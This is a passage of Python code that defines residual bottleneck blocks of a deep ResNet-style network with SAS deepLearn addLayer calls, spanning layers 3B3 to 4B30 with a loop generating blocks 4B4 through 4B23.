s.deepLearn.addLayer(model=model_table_opts, name='res3b3_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b2'])
# res3b3_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b3_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b3_branch2a'])
# res3b3_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b3_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b3_branch2a'])
# res3b3_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b3_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b3_branch2b'])
# res3b3_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b3_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b3_branch2b'])
# res3b3_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b3_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b3_branch2c'])
# res3b3 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b3',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b3_branch2c', 'res3b2'])
# ------------------- Residual Layer 3B4 -----------------------
# res3b4_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b4_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b3'])
# res3b4_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b4_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b4_branch2a'])
# res3b4_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b4_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b4_branch2a'])
# res3b4_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b4_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b4_branch2b'])
# res3b4_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b4_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b4_branch2b'])
# res3b4_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b4_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b4_branch2c'])
# res3b4 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b4',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b4_branch2c', 'res3b3'])
# ------------------- Residual Layer 3B5 -----------------------
# res3b5_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b5_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b4'])
# res3b5_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b5_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b5_branch2a'])
# res3b5_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b5_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b5_branch2a'])
# res3b5_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b5_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b5_branch2b'])
# res3b5_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b5_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b5_branch2b'])
# res3b5_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b5_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b5_branch2c'])
# res3b5 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b5',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b5_branch2c', 'res3b4'])
# ------------------- Residual Layer 3B6 -----------------------
# res3b6_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b6_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b5'])
# res3b6_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b6_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b6_branch2a'])
# res3b6_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b6_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b6_branch2a'])
# res3b6_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b6_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b6_branch2b'])
# res3b6_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b6_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b6_branch2b'])
# res3b6_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b6_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b6_branch2c'])
# res3b6 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b6',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b6_branch2c', 'res3b5'])
# ------------------- Residual Layer 3B7 -----------------------
# res3b7_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b7_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b6'])
# res3b7_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b7_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b7_branch2a'])
# res3b7_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b7_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b7_branch2a'])
# res3b7_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b7_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b7_branch2b'])
# res3b7_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b7_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b7_branch2b'])
# res3b7_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b7_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b7_branch2c'])
# res3b7 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b7',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b7_branch2c', 'res3b6'])
# ------------- Layer 4A --------------------
# res4a_branch1 layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a_branch1',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res3b7'])
# res4a_branch1 batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4a_branch1',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4a_branch1'])
# res4a_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res3b7'])
# res4a_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4a_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4a_branch2a'])
# res4a_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4a_branch2a'])
# res4a_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4a_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4a_branch2b'])
# res4a_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4a_branch2b'])
# res4a_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4a_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4a_branch2c'])
# res4a residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4a_branch2c', 'bn4a_branch1'])
# ------------------- Residual Layer 4B1 -----------------------
# res4b1_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b1_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4a'])
# res4b1_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b1_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b1_branch2a'])
# res4b1_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b1_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b1_branch2a'])
# res4b1_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b1_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b1_branch2b'])
# res4b1_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b1_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b1_branch2b'])
# res4b1_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b1_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b1_branch2c'])
# res4b1 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b1',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b1_branch2c', 'res4a'])
# ------------------- Residual Layer 4B2 -----------------------
# res4b2_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b2_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b1'])
# res4b2_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b2_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b2_branch2a'])
# res4b2_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b2_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b2_branch2a'])
# res4b2_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b2_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b2_branch2b'])
# res4b2_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b2_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b2_branch2b'])
# res4b2_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b2_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b2_branch2c'])
# res4b2 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b2',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b2_branch2c', 'res4b1'])
# ------------------- Residual Layer 4B3 -----------------------
# res4b3_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b3_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b2'])
# res4b3_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b3_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b3_branch2a'])
# res4b3_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b3_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b3_branch2a'])
# res4b3_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b3_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b3_branch2b'])
# res4b3_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b3_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b3_branch2b'])
# res4b3_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b3_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b3_branch2c'])
# res4b3 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b3',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b3_branch2c', 'res4b2'])
# ------------------- Residual Layers 4B4 - 4B23 -----------------------
# Blocks res4b4 through res4b23 are identical ResNet bottleneck identity
# blocks on 14 x 14 feature maps:
#   1x1 conv (256) -> BN+ReLU -> 3x3 conv (256) -> BN+ReLU
#   -> 1x1 conv (1024) -> BN -> add block input (res4b{i-1}) -> ReLU
# They are emitted in a loop instead of twenty hand-written copies so the
# pattern is stated once and the layer wiring cannot drift between blocks.
# The loop stops at 23 because block 4B24 is defined explicitly below.
for block_idx in range(4, 24):
    # Input of this identity block; also the shortcut of its residual add.
    prev_res = 'res4b{}'.format(block_idx - 1)
    # branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
    s.deepLearn.addLayer(model=model_table_opts,
                         name='res4b{}_branch2a'.format(block_idx),
                         layer=dict(type='convolution', nFilters=256, width=1,
                                    height=1, stride=1, includebias=False,
                                    act='identity'),
                         srcLayers=[prev_res])
    # branch2a batch norm layer: 256 channels, output = 14 x 14
    s.deepLearn.addLayer(model=model_table_opts,
                         name='bn4b{}_branch2a'.format(block_idx),
                         layer=dict(type='batchnorm', act='relu'),
                         srcLayers=['res4b{}_branch2a'.format(block_idx)])
    # branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
    s.deepLearn.addLayer(model=model_table_opts,
                         name='res4b{}_branch2b'.format(block_idx),
                         layer=dict(type='convolution', nFilters=256, width=3,
                                    height=3, stride=1, includebias=False,
                                    act='identity'),
                         srcLayers=['bn4b{}_branch2a'.format(block_idx)])
    # branch2b batch norm layer: 256 channels, output = 14 x 14
    s.deepLearn.addLayer(model=model_table_opts,
                         name='bn4b{}_branch2b'.format(block_idx),
                         layer=dict(type='batchnorm', act='relu'),
                         srcLayers=['res4b{}_branch2b'.format(block_idx)])
    # branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
    s.deepLearn.addLayer(model=model_table_opts,
                         name='res4b{}_branch2c'.format(block_idx),
                         layer=dict(type='convolution', nFilters=1024, width=1,
                                    height=1, stride=1, includebias=False,
                                    act='identity'),
                         srcLayers=['bn4b{}_branch2b'.format(block_idx)])
    # branch2c batch norm layer: 1024 channels, output = 14 x 14 (no ReLU
    # here -- the activation is applied after the residual addition)
    s.deepLearn.addLayer(model=model_table_opts,
                         name='bn4b{}_branch2c'.format(block_idx),
                         layer=dict(type='batchnorm', act='identity'),
                         srcLayers=['res4b{}_branch2c'.format(block_idx)])
    # residual layer: 1024 channels, output = 14 x 14; adds the block
    # input (shortcut) to the BN output, then applies ReLU
    s.deepLearn.addLayer(model=model_table_opts,
                         name='res4b{}'.format(block_idx),
                         layer=dict(type='residual', act='relu'),
                         srcLayers=['bn4b{}_branch2c'.format(block_idx),
                                    prev_res])
# ------------------- Residual Layer 4B24 -----------------------
# res4b24_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b24_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b23'])
# res4b24_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b24_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b24_branch2a'])
# res4b24_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b24_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b24_branch2a'])
# res4b24_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b24_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b24_branch2b'])
# res4b24_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b24_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b24_branch2b'])
# res4b24_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b24_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b24_branch2c'])
# res4b24 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b24',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b24_branch2c', 'res4b23'])
# ------------------- Residual Layer 4B25 -----------------------
# res4b25_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b25_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b24'])
# res4b25_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b25_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b25_branch2a'])
# res4b25_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b25_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b25_branch2a'])
# res4b25_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b25_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b25_branch2b'])
# res4b25_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b25_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b25_branch2b'])
# res4b25_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b25_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b25_branch2c'])
# res4b25 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b25',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b25_branch2c', 'res4b24'])
# ------------------- Residual Layer 4B26 -----------------------
# res4b26_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b26_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b25'])
# res4b26_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b26_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b26_branch2a'])
# res4b26_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b26_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b26_branch2a'])
# res4b26_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b26_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b26_branch2b'])
# res4b26_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b26_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b26_branch2b'])
# res4b26_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b26_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b26_branch2c'])
# res4b26 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b26',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b26_branch2c', 'res4b25'])
# ------------------- Residual Layer 4B27 -----------------------
# res4b27_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b27_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b26'])
# res4b27_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b27_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b27_branch2a'])
# res4b27_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b27_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b27_branch2a'])
# res4b27_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b27_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b27_branch2b'])
# res4b27_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b27_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b27_branch2b'])
# res4b27_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b27_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b27_branch2c'])
# res4b27 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b27',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b27_branch2c', 'res4b26'])
# ------------------- Residual Layer 4B28 -----------------------
# res4b28_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b28_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b27'])
# res4b28_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b28_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b28_branch2a'])
# res4b28_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b28_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b28_branch2a'])
# res4b28_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b28_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b28_branch2b'])
# res4b28_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b28_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b28_branch2b'])
# res4b28_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b28_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b28_branch2c'])
# res4b28 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b28',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b28_branch2c', 'res4b27'])
# ------------------- Residual Layer 4B29 -----------------------
# res4b29_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b29_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b28'])
# res4b29_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b29_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b29_branch2a'])
# res4b29_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b29_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b29_branch2a'])
# res4b29_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b29_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b29_branch2b'])
# res4b29_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b29_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b29_branch2b'])
# res4b29_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b29_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b29_branch2c'])
# res4b29 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b29',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b29_branch2c', 'res4b28'])
# ------------------- Residual Layer 4B30 -----------------------
# res4b30_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b30_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b29'])
# res4b30_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b30_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b30_branch2a'])
# res4b30_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b30_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b30_branch2a'])
# res4b30_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b30_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b30_branch2b'])
# res4b30_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b30_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b30_branch2b'])
